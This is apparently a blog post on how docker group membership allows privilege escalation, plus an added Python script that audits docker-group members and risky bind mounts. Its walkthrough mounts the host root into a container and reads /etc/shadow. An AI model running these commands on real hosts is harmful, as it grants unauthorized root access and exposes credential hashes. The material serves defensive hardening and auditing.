I don’t think Docker needs an introduction at this point, but in case you are unfamiliar with it: it is a way of isolating software packages through OS-level virtualization, running each of them in a “container.” It works in a similar way to traditional virtual machines, but with much less overhead, because the kernel is shared between all the containers on the host.
The problem arises when a host user is added to the docker group. The Docker daemon runs as root, and membership of the docker group grants access to its control socket, so an unauthorized person who has access to that host user (with ordinary user privileges) can easily escalate privileges by mounting the host filesystem into one of the containers, which grants the attacker full access to the host filesystem.
First, make sure the host user is part of the docker group:

```
alice@jada:~$ groups
alice cdrom floppy audio dip video plugdev netdev bluetooth docker
```
Run `docker container ps` to get a quick list of the containers:

```
alice@jada:~$ docker container ps
CONTAINER ID   IMAGE        COMMAND                   NAMES
f00ba96171c5   container1   "docker-php-entrypoi…"   container1
ce2ecb56a96e   container2   "/etc/bind/entrypoin…"   container2
620b296204a3   container3   "/usr/sbin/sshd -D"       container3
```
From here you can spawn a tty for each container:

```
alice@jada:~$ docker run -ti container1 bash
root@f00ba96171c5:/#
```
Even better, you can specify `-v` to mount the entire filesystem of the host into one of the containers before accessing it. It doesn’t matter which one.

```
alice@jada:~$ docker run -v /:/mnt/pwned -ti container2
root@ce2ecb56a96e:/# cat /mnt/pwned/etc/shadow
```
You now have full access to the host volume, and from here it’s just a matter of grabbing keys, hashes, and whatnot to get a shell.
Takeaways
Don’t assign users to docker groups.
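To check a host for exactly the two conditions this post walks through (users in the docker group, and containers with the host root bind-mounted into them) the following audit script can be used. It is an added example and not part of the original post; it parses the text of /etc/group and the JSON that `docker inspect` produces. The /etc/group excerpt and the inspect output embedded below are constructed samples so the script runs offline; on a real host you would feed it the actual files and command output, as noted in the comments.

```python
"""Audit helpers for the docker-group privilege-escalation risk.

Added example (not the original post's code). Inputs are the text of
/etc/group and the JSON printed by `docker inspect`; constructed samples
are embedded so the script runs offline.
"""
import json

# Constructed /etc/group excerpt (not taken from a real host).
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:alice
docker:x:998:alice,bob
www-data:x:33:
"""

# Constructed `docker inspect` output for two containers: one with the host
# root filesystem bind-mounted into it (the pattern from the post), one with
# a harmless named volume. Field names follow the real inspect schema.
SAMPLE_INSPECT_JSON = json.dumps([
    {
        "Id": "ce2ecb56a96e0000000000000000000000000000000000000000000000000000",
        "Name": "/container2",
        "HostConfig": {"Privileged": False},
        "Mounts": [
            {"Type": "bind", "Source": "/", "Destination": "/mnt/pwned", "RW": True}
        ],
    },
    {
        "Id": "0123456789ab0000000000000000000000000000000000000000000000000000",
        "Name": "/webapp",
        "HostConfig": {"Privileged": False},
        "Mounts": [
            {"Type": "volume", "Name": "webdata",
             "Source": "/var/lib/docker/volumes/webdata/_data",
             "Destination": "/var/www", "RW": True}
        ],
    },
])

# Host paths that hand a container control over the host when bind-mounted.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock",
                        "/run/docker.sock", "/proc", "/sys", "/dev")


def docker_group_members(group_file_text):
    """Return the member list from the docker: line of an /etc/group file."""
    for line in group_file_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[0] == "docker":
            return [m for m in fields[3].split(",") if m]
    return []


def _is_sensitive(source):
    """True if `source` is one of SENSITIVE_HOST_PATHS or lies beneath one."""
    source = source.rstrip("/") or "/"
    for path in SENSITIVE_HOST_PATHS:
        norm = path.rstrip("/") or "/"
        if source == norm or (norm != "/" and source.startswith(norm + "/")):
            return True
    return False


def risky_bind_mounts(inspect_json_text):
    """Return (container, host_source, container_dest) for every bind mount
    of a sensitive host path found in `docker inspect` output."""
    findings = []
    for container in json.loads(inspect_json_text):
        name = container.get("Name", container.get("Id", "?")).lstrip("/")
        for mount in container.get("Mounts", []):
            if mount.get("Type") == "bind" and _is_sensitive(mount.get("Source", "")):
                findings.append((name, mount["Source"], mount.get("Destination", "?")))
    return findings


def audit(group_file_text, inspect_json_text):
    """Combine both checks into a list of human-readable findings."""
    report = []
    for user in docker_group_members(group_file_text):
        report.append(f"user {user!r} is in the docker group (root-equivalent on this host)")
    for name, src, dst in risky_bind_mounts(inspect_json_text):
        report.append(f"container {name!r} bind-mounts host {src!r} at {dst!r}")
    return report


if __name__ == "__main__":
    # On a real host: audit(open("/etc/group").read(),
    #                       subprocess.check_output(["docker", "inspect", *ids]))
    for finding in audit(SAMPLE_GROUP_FILE, SAMPLE_INSPECT_JSON):
        print("WARN:", finding)
```

The group check is the one that matters most: a user who appears on the docker line can create the root bind mount at any time, so finding no risky mounts right now says little on its own. The mount check is still worth running, since it catches the post's `-v /:/mnt/pwned` pattern in containers that are already up.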